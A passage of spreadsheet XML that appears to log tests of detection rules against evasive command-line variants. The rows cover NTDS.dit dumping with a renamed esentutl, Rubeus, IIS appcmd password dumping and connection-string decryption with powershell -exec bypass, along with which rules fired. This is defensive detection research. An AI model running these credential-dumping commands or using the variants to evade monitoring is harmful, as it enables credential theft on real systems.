        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /"p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119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119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E120" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /p -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120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120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E121" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe /P /d ntds.dit</t>
        </is>
      </c>
      <c r="F121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121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121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\esentutl.exe %temp%\not_suspicious.exe &amp;&amp; %temp%\not_suspicious.exe -"p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122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122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E123" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /d ntds.dit</t>
        </is>
      </c>
      <c r="F123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /D ntds.dit</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E125" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/P" -d ntds.dit</t>
        </is>
      </c>
      <c r="F125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E126" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" -d ntds.dit</t>
        </is>
      </c>
      <c r="F126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C127" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D127" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E127" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p"" /"d" ntds.dit</t>
        </is>
      </c>
      <c r="F127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C128" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D128" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E128" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" -"d" ntds.dit</t>
        </is>
      </c>
      <c r="F128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="44" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_esentutl_params</t>
        </is>
      </c>
      <c r="C129" s="44" t="inlineStr">
        <is>
          <t>Esentutl Gather Credentials</t>
        </is>
      </c>
      <c r="D129" s="44" t="inlineStr">
        <is>
          <t>7df1713a-1a5b-4a4b-a071-dc83b144a101</t>
        </is>
      </c>
      <c r="E129" s="44" t="inlineStr">
        <is>
          <t>esentutl.exe "/p" /"d" ntds.dit</t>
        </is>
      </c>
      <c r="F129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil (8bc64091-6875-4881-aaf9-7bd25b5dda08)</t>
        </is>
      </c>
      <c r="J129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="n"/>
      <c r="B130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C130" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D130" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E130" s="44" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I130" s="43" t="n"/>
      <c r="J130" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="n"/>
      <c r="B131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C131" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D131" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E131" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config /section:identity</t>
        </is>
      </c>
      <c r="F131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E132" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config -"section:identity"</t>
        </is>
      </c>
      <c r="F132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C133" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D133" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E133" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config /section:idENtitY</t>
        </is>
      </c>
      <c r="F133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J133" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E134" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config /sECtiOn:identity</t>
        </is>
      </c>
      <c r="F134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E135" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config /"section:identity"</t>
        </is>
      </c>
      <c r="F135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_service_account_password_dumped</t>
        </is>
      </c>
      <c r="C136" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Service Account Password Dumped</t>
        </is>
      </c>
      <c r="D136" s="44" t="inlineStr">
        <is>
          <t>2d3cdeec-c0db-45b4-aa86-082f7eb75701</t>
        </is>
      </c>
      <c r="E136" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\inetsrv\appcmd.exe C:\Windows\Temp\not_evil.exe &amp;&amp; C:\Windows\Temp\not_evil.exe list config /sECTIon:IdENtity</t>
        </is>
      </c>
      <c r="F136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J136" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E137" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -exec bypass -c "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E138" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -EXeC bypass -c "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E139" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOp -eXEC bypass -Command "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J139" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="n"/>
      <c r="B140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C140" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D140" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E140" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -EXec bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="n"/>
      <c r="B141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C141" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D141" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E141" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExEc bypass -Command "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="n"/>
      <c r="B142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C142" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D142" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E142" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NOP -EXec bypass -C "&amp; { [System.Reflection.Assembly]::LoadFrom('C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe'); [YourNamespace.YourClass]::DecryptConnectionStrings('connectionStrings', 'C:\inetpub\wwwroot') }"</t>
        </is>
      </c>
      <c r="F142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_connection_strings_decryption</t>
        </is>
      </c>
      <c r="C143" s="44" t="inlineStr">
        <is>
          <t>Microsoft IIS Connection Strings Decryption</t>
        </is>
      </c>
      <c r="D143" s="44" t="inlineStr">
        <is>
          <t>97dbf6e2-e436-44d8-abee-4261b24d3e41</t>
        </is>
      </c>
      <c r="E143" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe,Control_RunDLL -pdf connectionStrings C:\inetpub\wwwroot</t>
        </is>
      </c>
      <c r="F143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="44" t="b">
